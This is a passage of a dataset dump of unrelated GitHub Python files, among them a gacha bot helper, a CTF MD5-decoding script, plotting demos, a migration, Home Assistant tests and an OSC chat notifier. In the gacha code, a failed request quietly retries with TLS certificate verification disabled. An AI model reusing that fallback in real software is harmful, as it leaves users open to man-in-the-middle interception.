'news')\nbanner_path = os.path.join(data_path, 'banner.json')\nconfig_path = os.path.join(data_path, 'config.json')\npools_path = os.path.join(data_path, 'pools.json')\ngacha_path = os.path.join(data_path, 'gacha.json')\nlucky_path = os.path.join(data_path, 'lucky_bag.json')\nbanner_data_path = os.path.join(data_path, 'b_data.json')\nupdate_data_path = os.path.join(data_path, 'update.json')\n\nold_pools_path = os.path.join(runtime_path, 'data/old_pools.json')\n\nnews_path = os.path.join(data_path, 'news.json')\nnews_detail_path = os.path.join(data_path, 'news_detail.json')\n\nstatic_path = os.path.join(runtime_path, 'res')\nseal_path = os.path.join(static_path, '海の翁.jpg')\nframe_path = os.path.join(static_path, 'background.png')\nback_path = os.path.join(static_path, 'back.jpg')\nback_cn_path = os.path.join(static_path, 'back_cn.png')\nmask_path = os.path.join(static_path, 'mask.png')\nfont_path = os.path.join(static_path, 'SourceHanSansSC-Regular.otf')\n\ncrt_folder_path = os.path.join(runtime_path, \"crt\")\ncrt_path = \"ca-certificates.crt\"\n\nall_servant_path = os.path.join(data_path, \"all_svt.json\")\nall_command_path = os.path.join(data_path, \"all_cmd.json\")\nall_craft_path = os.path.join(data_path, \"all_cft.json\")\n\nlib_servant_path = os.path.join(data_path, \"lib_svt.json\")\nlib_command_path = os.path.join(data_path, \"lib_cmd.json\")\nlib_craft_path = os.path.join(data_path, \"lib_cft.json\")\n\nall_json = [\n banner_path, config_path, pools_path, gacha_path, lucky_path,\n banner_data_path, update_data_path, old_pools_path,\n news_path, news_detail_path,\n all_servant_path, all_command_path, all_craft_path,\n lib_servant_path, lib_command_path, lib_craft_path\n]\n\n\ndef create_img(text: str) -> str:\n font_size = 30\n padding = 10\n\n font = ImageFont.truetype(font_path, font_size)\n\n wit, hei = font.getsize_multiline(text)\n img = Image.new(\"RGB\", (wit + padding * 2, hei + padding * 2), \"white\")\n draw = ImageDraw.Draw(img)\n draw.multiline_text((padding / 2, padding / 2), text, font=font, fill=\"black\")\n\n pic = util.pic2b64(img)\n msg = str(MessageSegment.image(pic))\n return msg\n\n\ndef gen_node(text: Union[str, List[str]], _name: str = \"涩茄子\", _uin: str = \"2902388901\") -> dict:\n node = {\n \"type\": \"node\",\n \"data\": {\n \"name\": _name,\n \"uin\": _uin,\n \"content\": text\n }\n }\n\n return node\n\n\ndef load_config(ev: CQEvent, get_group: bool = False) -> dict:\n gid = str(ev.group_id)\n if os.path.exists(config_path):\n try:\n configs = json.load(open(config_path, encoding=\"utf-8\"))\n if gid not in configs[\"groups\"]:\n basic_config = {\n \"crt_path\": crt_path,\n \"style\": \"图片\"\n }\n configs[\"groups\"][gid] = basic_config\n with open(config_path, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(configs, indent=2, ensure_ascii=False))\n\n if get_group:\n if gid in configs[\"groups\"]:\n return configs[\"groups\"][gid]\n else:\n return configs\n except json.decoder.JSONDecodeError:\n pass\n\n basic_config = {\n \"crt_path\": crt_path,\n \"style\": \"图片\"\n }\n configs = {\n \"follow_latest\": True,\n \"flush_hour\": 0,\n \"flush_minute\": 60,\n \"flush_second\": 0,\n \"groups\": {\n gid: basic_config\n }\n }\n with open(config_path, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(configs, indent=2, ensure_ascii=False))\n\n if get_group:\n return basic_config\n else:\n return configs\n\n\nasync def getpic(url: str, img_path: str) -> bool:\n if os.path.exists(img_path):\n return True\n async with async_playwright() as p:\n browser = await p.chromium.launch()\n page = await browser.new_page()\n try:\n await page.goto(url)\n except Exception as e:\n sv.logger.error(f\"访问网站超时{type(e)}\\n`{e}`\")\n return False\n await asyncio.sleep(1)\n sv.logger.info(\"正在保存图片...\")\n await page.screenshot(\n path=img_path,\n full_page=True\n )\n sv.logger.info(\"正在压缩图片...\")\n img_convert = Image.open(img_path)\n img_convert.save(img_path, quality=70)\n sv.logger.info(\"图片保存成功!\")\n await browser.close()\n return True\n\n\ndef gen_ms_img(image: Union[bytes, Image.Image]) -> MessageSegment:\n if isinstance(image, bytes):\n return MessageSegment.image(\n util.pic2b64(Image.open(io.BytesIO(image)))\n )\n else:\n return MessageSegment.image(\n util.pic2b64(image)\n )\n\n\nasync def gen_img_from_url(img_url: str, crt_file: Union[bool, str]) -> Union[Exception, MessageSegment]:\n img_url = f\"https://fgo.wiki{img_url}\"\n image_bytes = await get_content(img_url, crt_file)\n if isinstance(image_bytes, Exception):\n return image_bytes\n return gen_ms_img(image_bytes)\n\n\nasync def get_content(url: str, crt_file: Union[bool, str]) -> Union[Exception, bytes]:\n try:\n return await (\n await aiorequests.get(url, timeout=20, headers=headers, verify=crt_file)\n ).content\n except OSError:\n return await (\n await aiorequests.get(url, timeout=20, verify=False, headers=headers)\n ).content\n except Exception as e:\n logger.error(f\"aiorequest error: {e}\")\n return e\n\n\nasync def gen_gacha_img(style: str, img_path: List[str], server: str) -> Image:\n # 文字图标版,更快\n if not style == \"图片\":\n cards = []\n for each in img_path:\n cards.append(Image.open(each).resize((66, 72)))\n rows = 3\n cols = 4\n base_img = Image.open(frame_path).resize(((66 * cols) + 40, (72 * rows) + 40))\n r_counter = 0\n c_counter = 0\n for each in cards:\n base_img.paste(each, ((66 * c_counter) + 20, (72 * r_counter) + 20))\n c_counter += 1\n if c_counter >= cols:\n r_counter += 1\n if r_counter >= rows:\n break\n else:\n c_counter = 0\n\n else:\n # 图片版,较慢\n if server == \"国服\":\n base_img = Image.open(back_cn_path).convert(\"RGBA\")\n else:\n base_img = Image.open(back_path).convert(\"RGBA\")\n masker = Image.open(mask_path).resize((width, height))\n\n for i, pic_path in enumerate(img_path):\n tmp_img = Image.open(pic_path).resize((width, height))\n tmp_img = tmp_img.convert('RGBA')\n base_img.paste(tmp_img, box_list[i], mask=masker)\n\n return base_img\n","repo_name":"kcn3388/fgogacha","sub_path":"path_and_json.py","file_name":"path_and_json.py","file_ext":"py","file_size_in_byte":14060,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"19691785826","text":"'''\n\tCreated by: Sukma Setyaji\n\tTime created: 2017-07-02 09:55\n\tthanks for solution and inspiration from:\n\t[1] https://github.com/HackThisCode/CTF-Writeups/blob/master/2017/EasyCTF/Hash%20On%20Hash/README.md\n\t[2] https://stackoverflow.com/questions/11555468/how-should-i-read-a-file-line-by-line-in-python\n'''\n\nimport hashlib\nhashdict = []\ndecoded = \"\"\n\nfor i in range(255):\n\thashdict.append(hashlib.md5(chr(i)).hexdigest())\n\nwith open('hashedtext.txt') as fp:\n for line in fp:\n for iterate in range(len(hashdict)):\n \tif line.strip() == hashdict[iterate]:\n \t\tdecoded += chr(iterate)\n \t\t\nf = open('decodedtext.txt','w')\nf.write(decoded)\n","repo_name":"suksest/ctf-tools","sub_path":"crypto/md5_hex_to_str.py","file_name":"md5_hex_to_str.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74938295204","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 15:39:05 2019\n\n@author: 10060638(heartofrevel)\n\"\"\"\n\nimport win32com.client\nimport docx2txt\n\n\ndef read_doc_file(doc_file_path):\n try:\n word = win32com.client.Dispatch(\"Word.Application\")\n word.visible = False\n word.Documents.Open(doc_file_path)\n doc = word.ActiveDocument\n return doc.Range().Text\n except Exception as e:\n print(\"Error reading the doc file : \"+str(e))\n finally:\n word.Application.Quit(-1)\n \n\ndef read_docx_file(docx_file_path):\n try:\n result = docx2txt.process(docx_file_path)\n return result\n except Exception as e:\n print(\"Error reading docx file : \"+str(e))\n \n ","repo_name":"heartofrevel/DataRevellers","sub_path":"Utilities/Readers.py","file_name":"Readers.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11869564329","text":"from time import sleep\n\nfrom PIL import Image\n\nfrom pitop import Pitop\n\npitop = Pitop()\nminiscreen = pitop.miniscreen\n\nimage = Image.open(\"/usr/lib/python3/dist-packages/pitop/miniscreen/images/rocket.gif\")\n\n# Run animation loop in background by setting `background` to True\nminiscreen.play_animated_image(image, background=True, loop=True)\n\n\n# Do stuff while showing image\nprint(\"Counting to 100 while showing animated image on miniscreen...\")\n\nfor i in range(100):\n print(\"\\r{}\".format(i), end=\"\", flush=True)\n sleep(0.2)\n\nprint(\"\\rFinished!\")\n\n# Stop animation\nminiscreen.stop_animated_image()\n","repo_name":"thymjan/pi-top-Python-SDK","sub_path":"examples/system/miniscreen/miniscreen_display_animated_image_loop_in_background.py","file_name":"miniscreen_display_animated_image_loop_in_background.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"30909658891","text":"def add (a, b):\n\treturn a+b\nprint (add (1, 4))\n\nmyList=[1,7,9,3,1,2,8]\nseen = []\nfor number in myList:\n if number in seen:\n print (\"Number repeated!\")\n else:\n seen.append(number)\nprint (\"Hello World\")\n#these functions are not used\n","repo_name":"A3ex1984/hello_world","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8944100564","text":"# -*- coding: utf-8 -*-\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# set the style and load the dataset\nsns.set(style=\"ticks\", color_codes=True)\ntips = sns.load_dataset(\"tips\")\ndiamonds = sns.load_dataset(\"diamonds\")\n\n# a simple example of boxplot\n# sns.catplot(x=\"day\", y=\"total_bill\", kind=\"box\", data=tips)\n\n# add a hue semantic\n# sns.catplot(x=\"day\", y=\"total_bill\", hue=\"smoker\", kind=\"box\", data=tips)\n\n# add additional column (\"weekend\") to provide more information\n# tips[\"weekend\"] = tips[\"day\"].isin([\"Sat\", \"Sun\"])\n# sns.catplot(x=\"day\", y=\"total_bill\", hue=\"weekend\", kind=\"box\", dodge=False, data=tips)\n\n# a related function boxenplot that can provide more information\n# sns.catplot(x=\"color\", y=\"price\", kind=\"boxen\", data=diamonds.sort_values(\"color\"))\n\n# a simple example of violinplot\nsns.catplot(x=\"total_bill\", y=\"day\", kind=\"violin\", data=tips)\n\nplt.show()\n","repo_name":"zhengxiang1994/seabornDemo","sub_path":"distribution_observation.py","file_name":"distribution_observation.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43197444302","text":"import os\nfrom .aioUAPI import Request as Api\nfrom .progress_bar import ProgressBar\n\n\nclass BaseScraper:\n def __init__(self,\n api: Api,\n categories_to_scraping: list or int or str = 'all',\n template_path: str = f'{os.path.dirname(os.path.abspath(__file__))}/template.html',\n result_dir: str = f'{os.getcwd()}/result',\n remove_after_parse: bool = False,\n create_dir_tree: bool = True,\n delay_rate: float = 1):\n self.api: Api = api\n self.template_path: str = template_path\n self.categories_to_scraping: list or int or str = categories_to_scraping\n self.result_dir: str = result_dir\n self.remove_after_parse: bool = remove_after_parse\n self.create_dir_tree: bool = create_dir_tree\n self.delay_rate: float = delay_rate\n self.progress: ProgressBar = ProgressBar(0)\n self.categories: dict = {}\n\n async def get_categories(self):\n response = await self.api.get('/shop/request', {'page': 'categories'})\n try:\n response = response['success']\n except KeyError:\n print('\\nError getting categories')\n else:\n for item in response:\n self.categories.update(self.categories_update(item))\n\n def categories_update(self, category: dict, local_path: str = '') -> dict:\n categories = {}\n cat_id = int(category['cat_id'])\n local_path = f\"{local_path}/{category['cat_name']}\".replace(':', ' -')\n categories.update({cat_id: {'cat_name': category['cat_name'], 'cat_url': category['cat_url'],\n 'local_path': local_path, 'goods_count': category['goods_count']}})\n if type(category['childs']) == list:\n for child in category['childs']:\n categories.update(self.categories_update(child, local_path))\n return categories\n\n def find_category(self, cat: str or int) -> dict or None:\n if type(cat) == str:\n return self.find_category_by_url(cat)\n elif type(cat) == int:\n return self.find_category_by_id(cat)\n\n def find_category_by_id(self, cat_id: int) -> dict or None:\n return self.categories.get(cat_id)\n\n def find_category_by_url(self, cat_url: str) -> dict or None:\n for cat in self.categories.values():\n if cat['cat_url'] == cat_url:\n return cat\n return None\n","repo_name":"MatthewAllDev/aio_ucoz_goods_scraper","sub_path":"uAPIscraper/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26871998479","text":"\"\"\"add scores\n\nRevision ID: 5c420357e3b3\nRevises: d9f252b4b7b5\nCreate Date: 2023-05-16 21:58:22.830635\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"5c420357e3b3\"\ndown_revision = \"d9f252b4b7b5\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"training_scores\",\n sa.Column(\"id\", sa.Integer(), nullable=False),\n sa.Column(\"training_id\", sa.Integer(), nullable=False),\n sa.Column(\"author\", sa.Integer(), nullable=False),\n sa.Column(\"score\", sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(\n [\"training_id\"],\n [\"trainings.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n with op.batch_alter_table(\"training_scores\", schema=None) as batch_op:\n batch_op.create_index(\n batch_op.f(\"ix_training_scores_id\"), [\"id\"], unique=False\n )\n\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"training_scores\", schema=None) as batch_op:\n batch_op.drop_index(batch_op.f(\"ix_training_scores_id\"))\n\n op.drop_table(\"training_scores\")\n # ### end Alembic commands ###\n","repo_name":"taller2-fiufit/svc-trainings","sub_path":"alembic/versions/5c420357e3b3_add_scores.py","file_name":"5c420357e3b3_add_scores.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31625400459","text":"#!/usr/bin/python\n# python get_py_most_abun.py 200mostAbunOTU_w_counts.txt most_abun_filename.txt\nimport sys\nimport re\nimport glob\n\ndef search(search_term):\n for filename in glob.glob('*.summary'):\n for line in open(filename,'r'):\n if re.search(search_term,line):\n# return line.strip()\n return filename\n\ndef main():\n fread = open(sys.argv[1],'r')\n fwrite = open(sys.argv[2],'w')\n for line in fread:\n seid = line.strip().split('\\t')\n search_term = (\" \"+seid[0]+': ')\n abun = search(search_term)\n fwrite.write(seid[0]+'\\t'+seid[1]+'\\t'+abun+'\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"metajinomics/qiime_tools","sub_path":"get_py_most_abun.py","file_name":"get_py_most_abun.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12684419216","text":"import configparser\nimport os\nclass ConfigUtils:\n def __init__(self,config_path):\n self.cfg = configparser.ConfigParser()\n self.cfg.read(config_path, encoding='utf-8')\n\n def read_value(self, section, key):\n value = self.cfg.get(section, key)\n return value\n\n @property# 把方法变为属性方法\n def URL(self):\n url = self.cfg.get('default', 'URL')\n return url\n\n @property\n def CASE_DATA_PATH(self):\n casedatapath = self.cfg.get('path', 'CASE_DATA_PATH')\n return casedatapath\n\n @property\n def LOG_PATH(self):\n log_path = self.cfg.get('path', 'LOG_PATH')\n return log_path\n\n @property\n def LOG_LEVEL(self):\n log_level = int(self.cfg.get('log', 'LOG_LEVEL'))\n return log_level\n\ncurrent_path = os.path.dirname(__file__)\nconfig_path = os.path.join(current_path, '../local_config/config.ini')\nconfigUtils = ConfigUtils(config_path)\n\n# 测试类\nif __name__ == '__main__':\n current_path = os.path.dirname(__file__)\n config_path = os.path.join(current_path, '../local_config/config.ini')\n conf = ConfigUtils(config_path)\n print(conf.read_value('default', 'URL'))\n print(conf.URL)\n print(conf.CASE_DATA_PATH)","repo_name":"nana0908/lucky_pydemo","sub_path":"interface_automation/common/config_utils.py","file_name":"config_utils.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30882734590","text":"from pathlib import Path\r\nfrom random import choice\r\nfrom flask import Flask, render_template, request, redirect, url_for, flash, jsonify, g\r\n\r\napp = Flask(__name__)\r\n\r\n@app.before_first_request\r\ndef get_fonts():\r\n font_dir = Path(__file__).parent.parent / 'fonts'\r\n g.fonts = [f.name for f in font_dir.iterdir() if f.is_file()]\r\n app.logger.info(f'Found {len(g.fonts)} local fonts')\r\n app.logger.debug(f'Fonts: {g.fonts}')\r\n\r\n@app.before_first_request\r\ndef get_images():\r\n image_dir = Path(__file__).parent.parent / 'images'\r\n g.images = [f.name for f in image_dir.iterdir() if f.is_file()]\r\n app.logger.info(f'Found {len(g.images)} local images')\r\n app.logger.debug(f'Images: {g.images}')\r\n\r\n@app.route('/')\r\ndef index():\r\n app.logger.debug(g.fonts)\r\n app.logger.debug(g.images)\r\n return 'Hello, World!'","repo_name":"bdunnette/jaas","sub_path":"src/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19088687740","text":"import copy\nimport sys\n\nmaxInt = sys.maxsize\nminInt = sys.maxsize*-1\n\ndef checkWinner(board):\n for i in range(0,3):\n if board[i][0]=='x' and board[i][1]=='x' and board[i][2]=='x':\n return 1\n if board[i][0]=='o' and board[i][1]=='o' and board[i][2]=='o':\n return -1\n if board[0][i]=='x' and board[1][i]=='x' and board[2][i]=='x':\n return 1\n if board[0][i]=='o' and board[1][i]=='o' and board[2][i]=='o':\n return -1\n \n if board[0][0]=='x' and board[1][1]=='x' and board[2][2]=='x':\n return 1\n elif board[0][2]=='x' and board[1][1]=='x' and board[2][0] == 'x':\n return 1\n elif board[0][2]=='o' and board[1][1]=='o' and board[2][0] == 'o':\n return -1\n elif board[0][0]=='o' and board[1][1]=='o' and board[2][2]=='o':\n return -1\n else: return 0\n \ndef isterminal(board):\n for i in range(0,3):\n for j in range(0,3):\n if(board[i][j]==''):\n return 1\n\n return 0 \n\ndef minimax(board,x,y,depth,ismaximiser):\n if(ismaximiser==True):\n board[x][y] = 'x' #maximizer\n bestmove = {'depth':maxInt,'score':minInt}\n else: \n board[x][y] = 'o' #minimizer\n bestmove = {'depth':maxInt,'score':maxInt}\n\n winner = checkWinner(board)\n if winner!=0:\n bestmove['depth'] = depth\n bestmove['score'] = winner\n return bestmove\n else:\n toContinue = isterminal(board)\n if toContinue==0:\n bestmove['depth'] = depth\n bestmove['score'] = 0\n return bestmove\n if ismaximiser==True: \n for i in range(0,3):\n for j in range(0,3):\n if(board[i][j]==''):\n p = copy.deepcopy(board)\n move = minimax(p,i,j,depth+1,not ismaximiser)\n if move.get('score')>bestmove.get('score'):\n bestmove['depth'] = move.get('depth')\n bestmove['score'] = move.get('score')\n elif move.get('score')==bestmove.get('score') and move.get('depth')bestmove.get('score') or move.get('score')==bestmove.get('score') and move.get('depth')bestmove.get('score') or move.get('score')==bestmove.get('score') and move.get('depth')=3', ]\n\nsetup(\n author=\"Balveer Singh\",\n author_email='balveer@geoiq.io',\n python_requires='>=3.6',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"Get started with a wide range of location-based features and build ml models using this package\",\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='geoiq_automl_us',\n name='geoiq_automl_us',\n packages=find_packages(include=['geoiq_automl_us', 'geoiq_automl_us.*']),\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/geoiq-io/geoiq_automl_us',\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"geoiq-io/geoiq_automl_us","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37582367890","text":"\"\"\"Tests for the Hyperion integration.\"\"\"\nfrom unittest.mock import AsyncMock, call, patch\n\nfrom hyperion.const import (\n KEY_COMPONENT,\n KEY_COMPONENTID_ALL,\n KEY_COMPONENTID_BLACKBORDER,\n KEY_COMPONENTID_BOBLIGHTSERVER,\n KEY_COMPONENTID_FORWARDER,\n KEY_COMPONENTID_GRABBER,\n KEY_COMPONENTID_LEDDEVICE,\n KEY_COMPONENTID_SMOOTHING,\n KEY_COMPONENTID_V4L,\n KEY_COMPONENTSTATE,\n KEY_STATE,\n)\n\nfrom homeassistant.components.hyperion.const import COMPONENT_TO_NAME\nfrom homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN\nfrom homeassistant.const import ATTR_ENTITY_ID, SERVICE_TURN_OFF, SERVICE_TURN_ON\nfrom homeassistant.helpers.typing import HomeAssistantType\nfrom homeassistant.util import slugify\n\nfrom . import call_registered_callback, create_mock_client, setup_test_config_entry\n\nTEST_COMPONENTS = [\n {\"enabled\": True, \"name\": \"ALL\"},\n {\"enabled\": True, \"name\": \"SMOOTHING\"},\n {\"enabled\": True, \"name\": \"BLACKBORDER\"},\n {\"enabled\": False, \"name\": \"FORWARDER\"},\n {\"enabled\": False, \"name\": \"BOBLIGHTSERVER\"},\n {\"enabled\": False, \"name\": \"GRABBER\"},\n {\"enabled\": False, \"name\": \"V4L\"},\n {\"enabled\": True, \"name\": \"LEDDEVICE\"},\n]\n\nTEST_SWITCH_COMPONENT_BASE_ENTITY_ID = \"switch.test_instance_1_component\"\nTEST_SWITCH_COMPONENT_ALL_ENTITY_ID = f\"{TEST_SWITCH_COMPONENT_BASE_ENTITY_ID}_all\"\n\n\nasync def test_switch_turn_on_off(hass: HomeAssistantType) -> None:\n \"\"\"Test turning the light on.\"\"\"\n client = create_mock_client()\n client.async_send_set_component = AsyncMock(return_value=True)\n client.components = TEST_COMPONENTS\n\n # Setup component switch.\n with patch(\n \"homeassistant.components.hyperion.switch.HyperionComponentSwitch.entity_registry_enabled_default\"\n ) as enabled_by_default_mock:\n enabled_by_default_mock.return_value = True\n await setup_test_config_entry(hass, hyperion_client=client)\n\n # Verify switch is on (as per TEST_COMPONENTS above).\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n assert entity_state\n assert entity_state.state == \"on\"\n\n # Turn switch off.\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_OFF,\n {ATTR_ENTITY_ID: TEST_SWITCH_COMPONENT_ALL_ENTITY_ID},\n blocking=True,\n )\n\n # Verify correct parameters are passed to the library.\n assert client.async_send_set_component.call_args == call(\n **{KEY_COMPONENTSTATE: {KEY_COMPONENT: KEY_COMPONENTID_ALL, KEY_STATE: False}}\n )\n\n client.components[0] = {\n \"enabled\": False,\n \"name\": \"ALL\",\n }\n call_registered_callback(client, \"components-update\")\n\n # Verify the switch turns off.\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n assert entity_state\n assert entity_state.state == \"off\"\n\n # Turn switch on.\n await hass.services.async_call(\n SWITCH_DOMAIN,\n SERVICE_TURN_ON,\n {ATTR_ENTITY_ID: TEST_SWITCH_COMPONENT_ALL_ENTITY_ID},\n blocking=True,\n )\n\n # Verify correct parameters are passed to the library.\n assert client.async_send_set_component.call_args == call(\n **{KEY_COMPONENTSTATE: {KEY_COMPONENT: KEY_COMPONENTID_ALL, KEY_STATE: True}}\n )\n\n client.components[0] = {\n \"enabled\": True,\n \"name\": \"ALL\",\n }\n call_registered_callback(client, \"components-update\")\n\n # Verify the switch turns on.\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n assert entity_state\n assert entity_state.state == \"on\"\n\n\nasync def test_switch_has_correct_entities(hass: HomeAssistantType) -> None:\n \"\"\"Test that the correct switch entities are created.\"\"\"\n client = create_mock_client()\n client.components = TEST_COMPONENTS\n\n # Setup component switch.\n with patch(\n \"homeassistant.components.hyperion.switch.HyperionComponentSwitch.entity_registry_enabled_default\"\n ) as enabled_by_default_mock:\n enabled_by_default_mock.return_value = True\n await setup_test_config_entry(hass, hyperion_client=client)\n\n entity_state = hass.states.get(TEST_SWITCH_COMPONENT_ALL_ENTITY_ID)\n\n for component in (\n KEY_COMPONENTID_ALL,\n KEY_COMPONENTID_SMOOTHING,\n KEY_COMPONENTID_BLACKBORDER,\n KEY_COMPONENTID_FORWARDER,\n KEY_COMPONENTID_BOBLIGHTSERVER,\n KEY_COMPONENTID_GRABBER,\n KEY_COMPONENTID_LEDDEVICE,\n KEY_COMPONENTID_V4L,\n ):\n entity_id = (\n TEST_SWITCH_COMPONENT_BASE_ENTITY_ID\n + \"_\"\n + slugify(COMPONENT_TO_NAME[component])\n )\n entity_state = hass.states.get(entity_id)\n assert entity_state, f\"Couldn't find entity: {entity_id}\"\n","repo_name":"fpetillo/home-assistant","sub_path":"tests/components/hyperion/test_switch.py","file_name":"test_switch.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36213475399","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n# 108021016 林雨璇 2-5 Palindrome.py\r\n\r\nstr = input('請輸入')\r\nstr2 = str[::-1]\r\n\r\nif str == str2:\r\n print('true')\r\nelse:\r\n print('false')\r\n ","repo_name":"vivian1008/109-2_Python","sub_path":"108021016 林雨璇 2-5 Palindrome.py","file_name":"108021016 林雨璇 2-5 Palindrome.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28559951778","text":"from pythonosc import udp_client, dispatcher, osc_server\r\nfrom PyQt5.QtCore import QThread, pyqtSignal, QTimer, pyqtSlot, QMutex\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom pythonosc.udp_client import SimpleUDPClient\r\n\r\nclass OSCNotifier(QThread):\r\n song_added_signal = pyqtSignal(str)\r\n song_already_in_queue_signal = pyqtSignal(str)\r\n custom_message_signal = pyqtSignal(str)\r\n clear_chat_signal = pyqtSignal()\r\n \r\n def __init__(self, ip=\"127.0.0.1\", port=9000):\r\n super().__init__()\r\n self.client = udp_client.SimpleUDPClient(ip, port)\r\n self.message_queue = []\r\n self.mutex = QMutex() # Lock to synchronize access to message_queue\r\n self.last_song_added = \"\"\r\n self.default_message = f\"Type: \\\"#song name\\\" in front of me to add a song to queue. Last Song: {self.last_song_added}\"\r\n \r\n self.song_added_signal.connect(self.on_song_added)\r\n self.custom_message_signal.connect(self.send_custom_message)\r\n self.clear_chat_signal.connect(self.clear_chat)\r\n \r\n self.timer = QTimer()\r\n self.timer.timeout.connect(self.handle_message_queue)\r\n self.handle_message_queue()\r\n\r\n \r\n @pyqtSlot(str)\r\n def send_custom_message(self, message):\r\n self.mutex.lock()\r\n self.message_queue.append(message)\r\n self.mutex.unlock()\r\n \r\n @pyqtSlot(str)\r\n def on_song_added(self, message):\r\n self.mutex.lock()\r\n self.message_queue.append(message + \" added to queue!\")\r\n self.last_song_added = message\r\n self.default_message = f\"Type: \\\"#song name\\\" in front of me to add a song to queue. Last Song: {self.last_song_added}\"\r\n self.mutex.unlock()\r\n print(message + \" added to queue!\")\r\n\r\n def handle_message_queue(self):\r\n if self.message_queue:\r\n self.display_message(self.message_queue.pop(0))\r\n self.timer.start(5000)\r\n else:\r\n self.display_default_message()\r\n self.timer.start(2500)\r\n\r\n def display_default_message(self):\r\n self.display_message(self.default_message)\r\n\r\n def display_message(self, message):\r\n self.client.send_message(\"/chatbox/input\", [message,True,False])\r\n \r\n def clear_chat(self):\r\n self.client.send_message(\"/chatbox/input\", [\"\",True,False])\r\n \r\nclass OSCListener(QThread):\r\n def __init__(self, ip=\"127.0.0.1\", port=9001):\r\n super().__init__()\r\n self._dispatcher = dispatcher.Dispatcher()\r\n self._dispatcher.map(\"/*\", self.print_all)\r\n \r\n self._server = osc_server.ThreadingOSCUDPServer((ip, port), self._dispatcher)\r\n print(\"Serving on {}\".format(self._server.server_address))\r\n \r\n def print_all(self, address, *args):\r\n print(f\"OSC message received on {address} with arguments: {args}\")\r\n\r\n def serve_forever(self):\r\n self._server.serve_forever()\r\n \r\nclass AvatarParameterChanger(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.parameters = {\r\n \"huehair\" : [1.0, 0.43],\r\n \"hueHighlights\" : [1.0, 0.43],\r\n \"huetats\" : [1.0, 0.43],\r\n \"hueclothes1\" : [1.0, 0.43],\r\n \"hueclothes2\" : [1.0, 0.43],\r\n \"hueMetal\" : [1.0, 0.43],\r\n \r\n }\r\n self.client = SimpleUDPClient(\"127.0.0.1\", 9000)\r\n\r\n def temporary_change_parameters(self):\r\n for key, values in self.parameters.items():\r\n self.send_osc_message(key, values[1])\r\n \r\n # Set a timer to reset parameters after duration\r\n QTimer.singleShot(int(2.5 * 1000), self.reset_parameters_to_default)\r\n\r\n def reset_parameters_to_default(self):\r\n for key, values in self.parameters.items():\r\n self.send_osc_message(key, values[0])\r\n\r\n def send_osc_message(self, address: str, value: float):\r\n 